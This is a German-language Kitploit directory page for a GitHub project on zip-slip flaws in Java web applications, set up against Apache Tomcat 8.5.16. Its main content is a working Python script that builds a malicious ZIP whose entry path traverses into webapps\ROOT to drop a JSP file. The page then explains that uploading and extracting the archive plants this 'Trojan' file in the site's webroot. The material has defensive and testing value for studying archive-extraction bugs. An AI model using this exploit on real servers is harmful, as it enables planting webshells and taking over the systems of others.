Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Java-Compressed-file-security — java web komprimierte Dateien Sicherheit Schwachstellen | Kitploit
Tools/GitHubGitHub/jas502n/java-compressed-file-security
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjas502n/java-compressed-file-security

Java-Compressed-file-security

java web komprimierte Dateien Sicherheit Schwachstellen

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
206vor 6 JahrenVon Kitploit geprüft

Java-Compressed-file-security java web Sicherheitslücke bei komprimierten Dateien

Testumgebung:

root@kitploit:~
Windows For Apache Tomcat/8.5.16

0x01 Erstellen einer bösartigen ZIP-Datei mit Directory Traversal

Code:

root@kitploit:~
#coding=utf-8

import zipfile  
import sys

if __name__ == "__main__":  
    try:
        with open("404.jsp", "r") as f:
            binary = f.read()
            zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
            info = zipfile.ZipInfo("test.zip")
            zipFile.writestr("..\\webapps\\ROOT\\404.jsp", binary)
            zipFile.close()
    except IOError as e:
        raise e

0x02 Datei hochladen, auf Entpacken klicken – die Trojaner-Datei wird in das webapps-Verzeichnis der Website entpackt

Tool herunterladen